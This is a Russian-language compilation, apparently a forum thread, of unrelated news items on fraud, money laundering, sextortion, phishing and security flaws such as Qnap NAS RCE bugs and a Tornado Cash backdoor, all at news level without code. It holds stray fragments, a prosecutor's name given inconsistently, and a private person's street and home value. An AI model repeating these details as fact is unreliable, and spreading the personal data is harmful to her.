Происходило все это, предположительно, с июня 2011 по март 2016 года, и было поделено прокуратурой на 12 этапов. Все начиналось с того, что аптеки в Бронксе и Юнион-Сити получали федеральные чеки возврата денег по налогам. Однако эти чеки не депонировались в банк, а с помощью Individual-1 и еще одного работника аптеки Prime Aid Union City изымались из прибывшей почты и попадали к Заретцеру, который за плату обналичивал их у своего знакомого Individual-2 в Бруклине, а полученную наличность вручал Individual-1 либо в его нью-джерсийском доме, либо на работе в аптеке. Для того, чтобы обналичить чеки, выписанные на аптеки Prime Aid, Заретцер использовал название своей компании-пустышки Prime Aid PHA, ложно утверждая, что аптеки компании Prime Aid Pharmacies тоже принадлежат ему. Он также «уводил» эти чеки от налогов в США через счета своих знакомых в банках в Канаде, откуда, опять же за плату, деньги возвращались на счета принадлежащей Individual-1 компании в Нью-Джерси. Помимо этого Заретцер помог Individual-1 спрятать от налогов деньги, переведя их в Канаду как выплаты по банковским ипотекам.
На встрече с Individual-3, когда Александр Заретцер пытался обналичить чеки приблизительно на 40 тыс. долларов, он сказал, что за 12% комиссионных может отмыть чеки на сумму больше 200 тыс. долларов, отправив их в Канаду и получив назад в США. На другой встрече, уже с Individual-2, Заретцер «в частности и по существу» обсуждал снижение своих комиссионных за переводы денег через Канаду до 9%, так как ему сказали, что за 12% можно просто положить деньги в банк и заплатить IRS, сколько требуется. Заретцер возразил, что Канада «самое лучшее место», поскольку там мягче относятся к «преступлениям белых воротников», и, как считает обвинение, попытался приуменьшить свою преступную роль, заявив, что «мы воруем деньги не у людей, а у гребаного правительства».
Примерно в 2018 году после того, как его пытались допросить по поводу отмытых чеков, Заретцер попросил Individual-1 заплатить за его адвоката и, в частности, пояснил, что в таком случае будет держать язык за зубами и на сделку с прокуратурой не пойдет. В сентябре 2020 года он в двух разговорах с Individual-1, которые, как и предыдущие, перехватывались ФБР, Заретцер а) назвал компании, которым он переводит деньги в Канаду; б) заверил, что там будут молчать и не пойдут на сотрудничество с властями; в) предложил Individual-1 соврать прокуратуре, отрицая, что ему что-либо известно о чеках с возвратом налогов, и г) в ответ на опасение, что власти могут узнать, чем занимаются Заретцер и Individual-1, ответил, что он никому ничего не скажет.
В разбивке на отдельные эпизоды это выглядело так, что 28 февраля 2012 года Заретцер получил от Individual-1 чеки на общую сумму 45139 долларов, а 29 апреля – на 130956 долларов, выписанные на нью-джерсийскую аптеку Prime Aid Union City, чтобы обналичить их в Бруклине у своего знакомого Individual-3. 7 мая это были чеки на 158088 долларов и 25 мая на 113065 долларов, но уже предназначенные аптеке в Бронксе. 12 апреля 2013 гола Заретцер обналичил в Бруклине, то есть отмыл для Individual-1 через Individual-3 чеки на 40 тыс. долларов, а с 22 по 28 января 2015 года обменивался с Individual-1 эсэмэсками по поводу чеков на общую сумму 300 тыс. долларов, которые будут переведены компании Prime Aid Pharmacies через канадские банки. Таких эпизодов было еще 4, а с 14 октября 2014 по 23 мая 2018 перечислены 4 других, когда проживающий в Нью-Джерси Individual-1 на основании уже совершенной аферы подавал налоговой службе IRS ложные данные об уплате подоходных налогов за предыдущие финансовые годы. «В результате этой аферы, - заключает обвинение, - с 2011 по август 2018 Заретцер помог Individual-1 года скрыть от IRS чеки на возврат подоходных налогов, причинив государству, а значит нам с вами, уважаемые налогоплательщики, ущерб на 9.098.112 долларов. Грозит им за это лишение свободы сроком до 5 лет и штрафы до 250 тыс. долларов, что немного, но и немало.
Дело № 3:21-cr-00653 «Соединённые Штаты против Александра Заретцера» в базе данных федеральных судов содержало только обвинение и уведомление, что следующее заседание назначено на 2 сентября и будет проходить по видеосвязи, а в базе данных федерального бюро тюрем Александр Заретцер не значится.
Пошарив по Интернету, я набрел него на сайте Woman.Ru, где в ноябре 2011 шла оживленная международная дискуссия по поводу четности и квалификации врачей. «ФБР опубликовало официальный пресс-релиз по поводу новой медицинской афёры в NYC, - написала американская участница дискуссии. - Как и предполагалось, важную роль в двух из трех мошеннических схем играла русскоязычная публика из Бруклина и Квинса. Согласно пресс-релизу, опубликованному следствием, одна из схем осуществлялась в бруклинских клиниках Bay Medical Care PC, SVS Wellcare Medical PLLC и SZS Medical Care PLLC. В качестве ее организаторов или участников были названы Лариса Шелабадова (Larisa Shelabadova), 34 года; Александр Заретцер (Alexander Zaretser), 31год; Анатолий Крайтер (Anatoly Kraiter) 33 года; Владимир Корнев (Vladimir Kornev), 52 года, и Елена Галпер (Yelena Galper) 38 лет. Эта великолепная пятерка пыталась украсть $71 миллион!»
Это было уже что-то, и отыскать пресс-релиз министерства юстиции от 2 ноября 2011 года не составило труда. По делу проходили 12 человек, а перечисленная выше «великолепная пятерка» бруклинцев, включая Александр Заретцера, обвинялась в отмывании денег. «Эти обвиняемые предположительно вкладывали много времени и энергии в попытки скрыть незаконно полученные государственные деньги, - заявила Лоретта Линч, тогдашний федеральный прокурор Восточного округа штата Нью-Йорк, куда входит Бруклин. – Отмывание денег составляет важную часть крупных афер в области здравоохранения и часто самую трудную часть в их разоблачении». В следующем пресс-релизе бруклинской прокуратуры по поводу Александра Заретцера от 8 апреля 2013 года сообщалось, что суд присяжных его оправдал.
А Лоретта Линч, которую рекомендовал в бруклинские федеральные прокуроры президент Билл Клинтон, в 2014 году по рекомендации президента Барака Обамы стала министром юстиции и первой афроамериканской на этом посту. В конце июня 2016 года о ней заговорили в связи с тем, что Линч и бывший президент Билл Клинтон встретились в частном порядке на борту самолета министерства юстиции, который стоял в ангаре аэропорта Феникса в Аризоне. Сообщалось, что они беседовали об участии тогдашнего госсекретаря Хиллари Клинтон в «сервергейте»
Устройствам компании Qnap угрожают непропатченные уязвимости, эксплуатация которых чревата исполнением произвольного кода. Проблемы влияют на устройства Qnap TS-231 NAS с версией прошивки 4.3.6.1446, а также на другие устройства компании при условии, что они используют ту же версию прошивки. При этом выпуск обновлений для модели TS-231 уже прекращен в силу ее возраста.
Проблемы в девайсах компании еще осенью прошлого года выявили эксперты SAM Seamless Network. Теперь они [рассказывают](https://securingsam.com/new- vulnerabilities-allow-complete-takeover/), что уязвимости позволяют полностью захватить сетевые устройства, включая доступ к сохраненным данным пользователя, и такая атака не требует каких-либо предварительных знаний. Хуже того, проблема может затронуть десятки тысяч уязвимых устройств.
Первая ошибка связана с веб-сервером NAS, который по умолчанию использует TCP- порт 8080 и существует из-за отсутствия надлежащей очистки ввода в некоторых API.
Так как предыдущие RCE-баги в устройствах Qnap, злоупотребляли страницами, которые не требуют аутентификации, но выполняют код на стороне сервера, исследователи SAM стали искать файлы cgi (которые хранятся локально на устройстве), которые реализуют такие страницы. И в ходе расследования было обнаружено, что HTTP-запросы к различным cgi (в основном к тем, которые не требуют предварительной аутентификации) могут косвенно использоваться для удаленного выполнения кода.
«Производитель может исправить эту уязвимость, просто позаботившись об очистке ввода в некоторых основных процессах и API, но на момент написания этой статьи патчи не было», — говорят эксперты.
Вторая уязвимость обнаружена в сервере DLNA, который использует порт TCP 8200 по умолчанию и обрабатывает запросы UPNP на этом порту. По данным SAM, ошибка тоже может использоваться для выполнения произвольного кода на уязвимых NAS.
Источник: xakep.ru/2021/04/02/qnap-nas-rces/
Оперативники БСТМ МВД России совместно со следователями Следственного департамента МВД России, коллегами из Чувашской Республики и 12 других регионов страны при содействии сотрудников ФСБ России ликвидировали сеть нелегальных узлов связи. С ее помощью находившиеся за рубежом злоумышленники получали возможность анонимно совершать преступления на территории нашей страны.
«Предварительно установлено, что криминальная схема действовала на территории 13 субъектов. Участники организованной группы действовали по указанию анонимного куратора, который находился за пределами Российской Федерации. Он через Интернет вербовал молодых людей и бесконтактным способом передавал им сим-боксы, с помощью которых номера звонивших менялись на российские.
Соучастники устанавливали оборудование в арендованных квартирах, обеспечивали его настройку и регулярную замену заблокированных сим-карт. Чтобы скрыть расположение сим-боксов, каждые несколько дней их перевозили в другое место», – рассказала официальный представитель МВД России Ирина Волк.
В результате проведенных обысков оперативники изъяли 39 единиц сетевого оборудования. В подразделения полиции доставлены 26 человек, которые могут быть причастны к противоправной деятельности.
«В настоящее время полицейским известно о более чем восьми тысячах номеров, которые использовались участниками криминальной схемы. С их помощью были совершены не менее ста мошенничеств и других противоправных деяний.
Уголовные дела об этих преступлениях запрошены Следственным департаментом МВД России из следственных органов субъектов Российской Федерации для соединения в одно производство», – сообщила Ирина Волк.
• Video: https://rutube.ru/video/e053218f25caf2a437cecc70b2dea46e/?r=plemwd
Бизнесмен из Дубая по имени Мирза Илиаз Баиг в течение нескольких дней потерял более 1,8 миллиона дирхамов, став жертвой серийных мошенников.
Как стало известно, г-н Баиг является управляющим компаниями Iveond Consultancy, IRA Travel and Tourism, а также IRA General Trading and Foodstuff, специализирующейся на поставках продуктов питания и строительных материалов.
Как сообщил пострадавший, Iveond Consultancy, поставляющая ноутбуки, LED- телевизоры и жесткие диски, понесла самые значительные убытки в размере 958,97 тысяч дирхамов. Компания IRA Travel and Tourism была обманута на 648 тысяч дирхамов, а IRA General Trading and Foodstuff, потеряла 200 тысяч дирхамов.
Компании-мошенники - Digital Genius Technologies, Daemo International, Noor Al Sidra Trading, Fair Words Goods Trading и Wahat Al Rayan Trading использовали один и тот же метод обмана - покупали товары и услуги с помощью чеков на постоплату, которые оказывались недействительными.
"Я полностью опустошен, - сказал г-н Баиг, - Это какой-то сюрреализм. У меня четыре предприятия в разных отраслях, и все они были обмануты по одной и той же схеме. Я не знаю, как мне оправиться от этих потерь".
Четыре из пяти мошеннических фирм были нацелены на компании г-на Баига. "Я подозреваю, что они были связаны между собой, поскольку обратились к нам практически одновременно в течение нескольких дней, и исчезли тоже вместе. Похоже, они работали сообща".
Г-н Баиг подал заявление в полицию, и теперь размышляет о будущем своего бизнеса. "Это большой финансовый удар. Возможно, мне придется закрыть одно из своих предприятий", - сказал он.
Еще один пострадавший бизнесмен, поставлявший орехи кешью компании Noor Al Sidra Trading, также сообщил об убытках в 110 тысяч дирхамов.
В коде криптовалютного миксера Tornado Cash обнаружили вредоносный JavaScript, который почти два месяца передавал данные депозитных сертификатов (deposit notes) на удаленный сервер.
Депозитные сертификаты работают как приватные ключи для средств, прошедших через миксер, и могут использоваться для повторного доступа к активам уже после их «смешивания». Обнаруженный бэкдор ставит под угрозу конфиденциальность и безопасность всех операций, проведенных через IPFS (запущенный 1 января 2024 года), включая ipfs.io, cf-ipfs.com и eth.link.
Сообщается, что вредоносный код был внедрен два месяца назад через governance proposal (номер 47) неким Butterfly Effects (предположительно, один из комьюнити-разработчиков). Первым эту проблему заметил исследователь под ником Gas404, а затем его находку подтвердил и основатель компании SlowMist, специализирующейся на блокчейн-безопасности. В своем отчете Gas404 призвав все заинтересованные стороны поскорее наложить вето на вредоносные governance proposal.
Gas404 отмечает, что вредоносная функциональность кодирует приватные депозитные сертификаты, чтобы те выглядели как обычные данные блокчейн- транзакций, и скрывает использование функции window.fetch.
Разработчики Tornado Cash уже подтвердили факт компрометации и предупредили о рисках, посоветовав пользователям изъять свои старые и, вероятно, скомпрометированные сертификаты, заменив их на вновь сгенерированные. Кроме того, всем рекомендовано отозвать свои голоса за governance proposal 47, чтобы отменить изменения и избавиться от вредоносного кода.
Напомним, что Tornado Cash — опенсорсный децентрализованный миксер на блокчейне Ethereum. Он использует криптографическую zero-knowledge систему SNARKs (Zero-Knowledge Succinct Non-Interactive Argument of Knowledge), чтобы пользователи могли вносить и выводить средства анонимно.
В 2022 году американские власти обвинили Tornado Cash в отмывании денег и наложили на проект санкции (хотя это не понравилось многим участникам криптовалютной индустрии), а в 2023 году основателей проекта обвинили в помощи преступникам в отмывании украденной криптовалюты на сумму более 1 млрд долларов. После этого исходный Tornado Cash прекратил свое существование, однако его кодовая база продолжает использоваться для новых теневых миксер- сервисов.
](https://gas404.medium.com/tornado-cash-notes-exploit-from-jan-1st-and-the- actions-you-must-take-6076748bc886)
If you have deposited to Tornado Cash using IPFS gateways ( like ipfs.io, cf- ipfs.com, eth.link ), your note would likely be exposed and…
 gas404.medium.com
300 компаний.
Она уже внедрена в линейку Mate 60
Китайская компания Huawei разработала новую технологию беспроводного соединения малого радиуса действия — NearLink.
Инновационная разработка представляет собой комбинацию преимуществ Wi-Fi и Bluetooth, обеспечивая быструю и энергоэффективную передачу данных на короткие расстояния.
По утверждениям разработчиков, скорость передачи данных с помощью NearLink
превосходит аналогичные показатели Bluetooth в шесть раз, при этом задержка
меньше в 30 раз, а энергопотребление ниже на 60%.
Также стоит отметить, что радиус действия выше в два раза, в то время как
количество возможных сетевых подключений больше примерно в 10 раз.
Технология NearLink уже внедрена в новейший смартфон компании — Mate 60.
Ожидается, что она будет интегрирована и в операционную систему HarmonyOS, а
также в другие продукты Huawei и их партнёров.
Сообщается также об активном сотрудничестве с более чем 300 компаниями,
большинство из которых базируются в Китае. В то же время такие игроки, как
Intel,
Qualcomm, AMD и NVIDIA пока не
присоединились к проекту.
[Source](https://www.ferra.ru/news/techlife/huawei-predstavila-zamenu- bluetooth-kotoruyu-uzhe-podderzhali-bolee-300-kompanii-25-09-2023.htm)
Разработчики Apple обнародовали RSR-патчи, исправляющие новую уязвимость нулевого дня (CVE-2023-37450), которая застрагивает пользователей iPhone, Mac и iPad. В компании предупредили, что эта проблема, похоже, уже используется злоумышленникам.
Напомню, что новый формат обновлений Rapid Security Response (RSR), запущенный компаний весной текущего года, представляет собой небольшие «заплатки», которые исправляют проблемы безопасности между выходами плановых патчей. Также внеплановые патчи могут использоваться для противодействия уязвимостям, которые уже активно используются в атаках.
На этот раз RSR-патчи содержат исправления для 0-day уязвимости CVE-2023-37450, которую компании раскрыл анонимный ИБ-исследователь. Apple рекомендует всем пользователям установить эти обновления, а также предупреждает, что эта проблема, вероятно, уже активно применяется хакерам. Подробностей об этих атаках пока нет.
Сообщается, что уязвимость была обнаружена в движке WebKit. Она позволяет злоумышленникам выполнять произвольный код на целевых устройствах, если злоумышленнику удастся обманом заставить цель открыть страницу, содержащую вредоносный контент.
RSR-патчи были выпущены для macOS Ventura 13.4.1, iOS 16.5.1, iPadOS 16.5.1 и Safari 16.5.2.
Бывший сотрудник полиции Луисвилла использовал технологии правоохранительных органов в рамках схемы, которая включала взлом аккаунтов Snapchat молодых женщин и использование сексуально откровенных фотографий и видео, сделанных ими, для вымогательства, сообщили федеральные прокуроры в судебных документах, поданных во вторник.
Согласно приговорному меморандуму, Брайан Уилсон использовал свой доступ к Accurint, мощному программному обеспечению для объединения данных, используемому полицейскими департаментами для помощи в расследованиях, для получения информации о потенциальных жертвах. Затем он делился этой информацией с хакером, который взламывал частные аккаунты Snapchat, чтобы получить сексуально откровенные фотографии и видео.
Если сексуально откровенные материалы были получены, Уилсон связывался с женщинами, угрожая разместить фотографии и видео в Интернете и поделиться ими с их друзьями, семьей, работодателем и коллегами, если ему не будут предоставлены более откровенные материалы сексуального характера.
В июне Минюст объявил, что Уилсон, которому на тот момент было 36 лет, признал себя виновным по обвинению в киберпреследовании, а также по обвинению, связанному с тем, что LMPD называет "Slushygate", серией инцидентов, в которых Уилсон и другие офицеры нападали на пешеходов, выбрасывая напитки из патрульных машин без опознавательных знаков, иногда снимая свои подвиги на видео.
По словам прокуроров, ФБР установило, что Уилсон участвовал во взломе 25 аккаунтов и вступил в контакт с восемью женщинами. Хотя Уилсон заявил, что взломом занимался другой человек, в документах федерального суда, с которыми ознакомился LEO Weekly, имя хакера не называется.
"Мне интересно, какую фотографию вы бы предпочли, чтобы я использовал в качестве центрального элемента коллажа, который я делаю", - написал Уилсон одной из жертв вместе с ее фотографиями, которые он получил, согласно судебным документам.
"Ты не против, если я их опубликую?" - продолжал он. "Говорю тебе, они всем понравятся!".
Когда жертва спросила, как он получил фотографии, Уилсон сказал: "Я планировал разослать твои фотографии твоим родителям, брату, бабушке, дедушке, сестрам, друзьям, на facebook, pornhub, работодателю и т.д., но я с удовольствием оставлю все это между нами (и скажу, кто мне их прислал), если ты пообещаешь не впутывать меня в эту драму и покажешь мне еще несколько фотографий, от чего мы оба только выиграем".
Согласно меморандуму о вынесении приговора, Уилсон продолжал публиковать в Интернете фотографии и видео некоторых женщин и "хвастался своими подвигами". Прокуроры написали, что он "предоставил другим контактную информацию своего Kik [приложение для обмена сообщениями], чтобы они могли найти других потенциальных жертв для взлома, а когда взлом был успешным, Уилсон делился с ними украденными фотографиями и видео".
Accurint, продукт брокерской фирмы LexisNexis Risk Solutions, рекламируется правоохранительным органам как инструмент, который может ускорить расследование и "обнаружить неочевидные связи между людьми, о которых иначе не было бы известно". Объединяя базы данных публичной и непубличной информации, Accurint может предоставить подробную информацию о человеке, включая номера его телефонов, родственников и знакомых, работодателей и профили социальных сетей, связанные с его электронной почтой.
Федеральные прокуроры написали, что во время обмена текстовыми сообщениями с целью вымогательства Уилсон называл жертв "шлюхами", "шлюхами" и "суками". Это, в сочетании с вымогательством и публикацией сексуально откровенных материалов в Интернете, "нанесло его жертвам невыразимую психологическую травму", - пишут прокуроры.
По крайней мере, у одной из жертв сексуально откровенные фото и видео были отправлены работодателю, что, по словам прокуроров, "почти привело к ее увольнению".
Прокуроры рекомендовали назначить Уилсону "наказание, соответствующее самому низкому пределу применимых правил назначения наказания" в результате его признания вины как по обвинению в "слэшгейте", так и по обвинению в киберпреследовании.
Бывшему офицеру LMPD Курту Флинну, который также признал себя виновным в "Слэшгейте", было рекомендовано три года условно с условием, что он будет работать на общественных работах.
Уилсону грозит максимум 15 лет лишения свободы, а Флинну - максимум 10 лет.
Приговор обоим должен быть вынесен 19 октября.
LMPD сообщило, что Флинн подал в отставку в июне, а Уилсон - в июле 2020 года.
Кроме того, в понедельник действующий сотрудник LMPD был арестован по обвинению в "порно мести" на уровне штата после того, как он якобы отправил сексуально откровенную фотографию женщины 19 людям в групповом текстовом сообщении.
source: leoweekly.com/2022/10/feds-ex-louisville-police-officer-used-law- enforcement-tech-to-help-hack-sexually-explicit-photos-from-women
Злоумышленник попросил платить ему зарплату вместо сотрудника.
Исследователи из Abnormal Security выявили группировку Chiffon Herring, нацеленную на сотрудников университетов в новых атаках по перехвату заработной платы (Payroll Diversion). Chiffon Herring действует с марта и в основном нацелена на местные школьные округа и университеты в США. Злоумышленники, предположительно, находятся в Нигерии и Южной Африке.
В рамках атаки киберпреступник выдает себя за преподавателя и отправляет электронное письмо заведующему кафедрой в университете или офисным сотрудникам школьного округа.
В электронном письме злоумышленник от имени преподавателя пишет, что он недавно сменил банк и ему необходимо обновить свои банковские реквизиты. Чтобы создать ощущение срочности, в электронном письме также упоминается, что предыдущая учетная запись станет неактивной до следующего дня выплаты зарплаты. В результате атаки мошенник указывает реквизиты своего счета, чтобы зарплата жертвы поступила на его счет. Согласно анализу, Chiffon Herring также использует инфраструктуру крупнейшего в мире регистратора доменов GoDaddy для отправки писем.
[](https://www.securitylab.ru/upload/images/content- img(469).png)
Почти во всех атаках Chiffon Herring предоставляет банковские реквизиты банка Green Dot для перенаправления средств. Счета в этих банках относительно легко открыть, и в основном они связаны с предоплаченными картами.
Карты предоплаты обычно используются в атаках по перехвату заработной платы для получения прямых депозитов за 48 часов до дня выплаты зарплаты. Таким образом, злоумышленник может иметь доступ к перенаправленным средствам в течение нескольких дней, прежде чем жертва обнаружит факт мошенничества.
Для обеспечения защиты от такой атаки нужно обучить всех сотрудников, особенно финансовых и кадровых, обнаруживать признаки фишинговых атак. Кроме того, учреждения и школы также должны внедрить решение для защиты электронной почты, чтобы блокировать вредоносные электронные письма.
source: intelligence.abnormalsecurity.com/blog/bec-group-targets-teachers- payroll-diversion-attacks
Сотрудники гражданской гвардии Испании задержали одного из самых крупных мошенников, который работал с криптовалютами. На фото: полиция изымает у него несколько автомобилей класса люкс.
По ее данным, на счетах задержанного в Валенсии 45-летнего мужчины блокировано более 2,5 млн евро.
Его жертвами становились в основном жители Испании и Португалии. Против него выдвинуты обвинения по семи пунктам, связанным с мошенничеством и отмыванием денег.
Представители гражданской гвардии Испании рассказали, что операция по выявлению мошенника, который создал финансовую пирамиду, продолжалась с августа прошлого года.
• Source: [https://www.lavanguardia.com/vida/2...yores-estafadores-europeos- criptomonedas.html](https://www.lavanguardia.com/vida/20220102/7964496/detenido- valencia-mayores-estafadores-europeos-criptomonedas.html)
В федеральной прокуратуре Южного округа штата Нью-Йорк в Манхэттене 15 декабря сообщили, что проживающий на Лонг-Айленде 48-летний эмигрант из Беларуси Сергей Полевиков признал себя виновным в мошенничестве с ценными бумагами путем «Инсайдерской торговли», то есть использованием закрытой информации в целях личного обогащения.
Инсайдерская торговля была частью американского рынка ценных бумаг с XVIII века, и аферы такого рода на бирже не новость, а суть их проста, как грабли. Брокер «Икс» работает в компании «Игрек», которая занимается операциями на бирже, где представляет своих клиентов. Клиент «Зет» обращается в компанию «Игрек» с просьбой продать (или купить) большое количество акций, о чем брокер «Икс» узнаёт раньше начала торгов и наживается на этом, покупая такие акции и быстро продавая их, так как после сообщения о крупной сделке их стоимость возрастает.
Сергей Викторович Полевиков работал таким брокером, а точнее, аналитиком по управлению активами, и был арестован 22 сентября 2021 года. На следующий день его освободили под залог в полтора миллиона долларов недвижимостью, принадлежащей его 48-летней жене Марине Аристава (Maryna Arystava) в поселке Порт-Вашингтон на Лонг-Айленде. Это двухэтажный дом на Бедфорд-роуд с тремя туалетами, семью комнатами и гаражом на две машины, а на сайте https://clustrmaps, где я отыскал ее адрес, отмечено, что, по данным на 2014 год, в Соединенных Штатах значились 27,273 Марины. Сергей Полевиков значится проживающим там же, но дом, очевидно, записан на его супругу.
По условиям освобождения он обязался сдать паспорта и другие путевые документы, не покидать Южный округ штата Нью-Йорк без разрешения, не заниматься профессиональной деятельностью, не размещать и не перемещать на своих банковских счетах суммы больше 10 тыс. долларов в месяц, за исключением расходов на адвокатов в сумме до 500 тыс. долларов, но с разрешения суда. В федеральном бюро тюрем Сергей Полевиков зарегистрирован как «48-летний белый мужчина» № 91376-054. Кстати, в предварительном обвинении (Complaint) указано, что «в результате аферы Полевикова через брокерский счет Ариставы прошли миллионы долларов незаконной прибыли», но ее ни в чем не обвиняют, и стоимость ее дома в полтора миллиона долларов, в который был оценен залог за освобождение ее мужа, у властей подозрения не вызвала.
Дело слушает федеральный судья Льюис Лиман, обвинение представляет помощник федерального прокурора Кирстен Флетчер, защищают подсудимого манхэттенские адвокаты Майкл Гербер и Джинни Рубин. 61-летнегго демократа Лимана в 2018 году рекомендовал президент-республиканец Дональд Трамп. Сергей Полевиков обвинялся в мошенничестве с ценными бумагами, в его деле пока два документа на эту тему: подписанная федеральным прокурором Южного округа штата Нью-Йорк Дамианом Уильямсом «Информация» (Information), на 4 страницах которой вкратце изложена юридическая суть содеянного Полевиковым, и более подробное предварительное обвинение (Complaint), объемом в 11 страниц, поданное следователем ФБР Томасом Макдоналдом судье-магистрату Джеймсу Котту 21 сентября 2021 года, за два дня до ареста Сергея Викторовича. Помимо этого, в деле есть еще одно предварительное обвинение, но по гражданскому делу «Соединенные Штаты против Сергея Полевикова и Марины Ариставы», поданное в тот же суд Федеральной комиссией по ценным бумагам (U.S. Securities and Exchange Commission). где ответчиками значатся Полевиков и Аристава.
Предъявленные уголовные обвинения грозили Полевикову лишением свободы на срок до 20 лет, но по условиям признания вины, которые пока неизвестны, он может рассчитывать на меньший срок. По этим условиям он согласился на конфискацию 8,564,977 долларов незаконной прибыли, которые должен внести до 1 апреля 2022 года. О себе следователь, которых в ФБР называют «специальными агентами», Томас Макдональд под присягой сообщил, что работает в бюро примерно 14 лет, в настоящее время служит в отделе расследования афер с ценными бумагами, и участвовал в нескольких таких делах, включая аресты подсудимых. «С января 2014 и минимум по октябрь 2019 года, - сообщил Макдоналд судье Котту, - … обвиняемый Сергей Полевиков намеренно и сознательно, прямо и косвенно, с помощью средств и способов торговли между штатами, почты и биржевых учреждений страны, использовал и применял искаженные и обманные устройства и приспособления купли-продажи ценных бумаг». Суть этой мудреной для обывателя фразы состояла в том, что Полевиков занимался «инсайдерской торговлей» сведениями, известными ему по роду работы. Следователь ФБР Макдонлд написал, что, что Полевиков работал в манхэттенской «компании-работодателе» (Employer Firm), но в других материалах дела уточняется, что он был аналитиком компании OppenheimerFunds, которую затем купила корпорация Invesco Limited. На странице Полевикова сайта LinkedIn написано, что он был там вице-президентом по управлению активами, в 1996 году закончил университет в Минске, и том же году прибыл в США, где поступил в частный Southern Methodist University в Техасе. Обучение в этом университете стоит примерно 60 тыс. долларов, и он стоит на 68-м месте среди вузов США.
Разъясняя свою формулировку, следователь ФБР Томас Макдональд написал, что по
долгу службы Сергей Полевиков имел доступ к информации о потенциальных сделках
с ценными бумагами, которые рассматривали клиенты его фирмы, включая несколько
инвестиционных компаний. Предположительно он «участвовал в опережающей схеме
незаконного присвоения конфиденциальной, существенной, закрытой информации о
поручениях на торговлю ценными бумагами от имени своих клиентов, чтобы
участвовать в краткосрочной торговле личными ценными бумагами на брокерском
счете, открытом на имя его жены». В служебном уставе этики сотрудников
OppenheimerFunds, написано, что им «запрещается лично зарабатывать на знаниях
о предполагаемых или совершаемых сделках с ценными бумагами на счетах клиентов
(компании). В связи с этим сотрудник не может приобретать или продавать ценные
бумаги на своем личном (брокерском) счете, зная, что распоряжение продавать
или покупать эти ценные бумаги было сделано на счете клиента».
Пытаясь скрыть свою аферу, утверждает следователь Макдональд в предварительном
обвинении, Полевиков лгал работодателю о торговых счетах и сделках с ценными
бумагами, тем самым нарушая Закон об инвестиционных компаниях. Как уточнила
Комиссия по ценным бумагам, Полевиков пользовался брокерским счетом на имя
жены примерно три тысячи раз, причем в тот же день, когда его компания
сообщала о крупной сделке с акциями клиентов.
Комментируя его признание вины, манхэттенский федеральный прокурор Дамиан Лииман, который был назначен два месяца назад, заявил, что «Сергей Полевиков нарушил закон, пользуясь существенной и не публичной информацией для совершения личных сделок перед крупными сделками своего работодателя,.. за что теперь ожидает приговора и должен вернуть больше 8 млн долларов незаконной прибыли».
Иллюстрируя эту аферу конкретными эпизодами, Томас Макдональд упомянул, что 19 января 2018 года после закрытия торгов на Нью-йоркской фондовой бирже компания, где работал Сергей Полевиков, разместила большой заказа на приобретение акций компании Itau Unibanco (ITUB). 22 января, до того как этот заказ был полностью выполнен, кто-то купил примерно 400 тыс. акций ITUB, и позже в тот же день компания Полевикова по условиям заказа купила почти 8 млн акций ITUB, отчего их цена стала расти, и этот «Некто», оказавшийся Сергеем Полевиковым, который продал свои 400 тыс. акций, заработав 96,358 долларов.
В другом случае 28 августа 2019 года компания, где работал Полевиков, то есть Oppen-heimerFunds, в 12:12 дня разместила на Нью-йоркской бирже большой заказ на продажу акций табачной компании Philip Morris International, Inc. (PM). Через три минуты Полевиков поставил на продажу 31 тыс. акций этой компании, а в конце дня его компания OppenheimerFunds продала больше 800 тыс. акций Philip Morris, отчего они стали дорожать, и на их продаже Сергей Викторович заработал 35 тыс. долларов. Следователь ФБР Томас Макдоналд пояснил, что брокерский счет этой аферы был открыт в 2011 году на имя Марины Аристава, жены Полевикова, которая в OppenheimerFunds никогда не работала.
Судья Льюис Лиман назначил приговор Сергею Полевикову на 12 апреля 2022 года, а тем временем в федеральном суде Массачусетса зреет новое дело об инсайдерской информации. В субботу 18 декабря из Швейцарии в США экстрадировали российского предпринимателя Владислава Клюшина, которого обвиняют в инсайдерской торговле ценными бумагами на основе похищенной и непубличной информации. По запросу нашего министерства юстиции 21 марта Клюшина арестовали на швейцарском курорте Цермат в кантоне Вале, куда он приехал с семьей на отдых, и экстрадировали после 9 месяцев попыток доказать неосновательность требований американской стороны. Его обвиняют в «торговле вместе с несколькими сообщниками инсайдерской информацией на сумму в десятки миллионов долларов , а также «хакерстве против IBM, Tesla и других американских транснациональных компаний». По данным российских независимых СМИ, Владислав Клюшин близок к первому заместителю главы администрации президента РФ Алексею Громову, а с 2000 по 2008 год работал в Кремле, в частности, отвечая за работу со СМИ. В настоящее время Клюшин возглавляет несколько компаний, в том числе группу «М13», специализирующуюся на программах для мониторинга СМИ и консалтингу в области кибербезопасности.
• Source: justice[.]gov/usao-sdny/pr/former-analyst-pleads-guilty-securities- fraud-committing-insider-trading-front-running
Осенью прошлого года и в начале текущего года известный ИБ-исследователь Сэми Камкар (Samy Kamkar) описал атаки NAT Slipstreaming и NAT Slipstreaming 2.0, которые позволяют скриптам на вредоносных сайтах обходить брандмауэры и подключаться к любому порту TCP/UDP в локальной сети посетителя. По сути, атака превращает браузер в прокси для злоумышленников, а для ее реализации нужно лишь обманом заманить пользователя на вредоносный сайт.

Поскольку уязвимость работает только на определенных портах, контролируемых Application Level Gateway (ALG) маршрутизатора, разработчики браузеров блокируют уязвимые порты, на которые не поступают большие объемы трафика. Так, в настоящее время в Google Chrome блокируется доступ по FTP, HTTP и HTTPS на портах 69, 137, 161, 554, 1719, 1720, 1723, 5060, 5061 и 6566.
Теперь разработчики заявили, что намерены заблокировать и TCP-порт 10080, который уже закрыт в Firefox с ноября 2020 года. Этот порт используют программа резервного копирования Amanda и VMWare vCenter, однако блокировка не должна повлиять на их работу. Гораздо хуже, что порт 10080 часто используется в качестве альтернативы порту 80.
«Это привлекательный порт для HTTP, потому что он оканчивается на “80” и не требует root-прав для привязки в системах Unix», — говорят разработчики.
Click to expand...
Источник: xakep.ru/2021/04/09/nat-slipstreaming-10080/
Для таких случаев в Google обещают предусмотреть корпоративную политику, которую разработчики смогут использовать для отмены блокировки.
В прошлом месяце разработчики и сопровождающие PHP предупредили о том, что неизвестные личности отправили два вредоносных коммита Git-репозиторий php- src, поддерживаемый командой PHP на сервере git.php.net.
Злоумышленники утверждали, что просто пытаются «исправить опечатку» и подписали эти коммиты именами известных разработчиков и сопровождающих PHP: Расмуса Лердорфа и Никиты Попова.
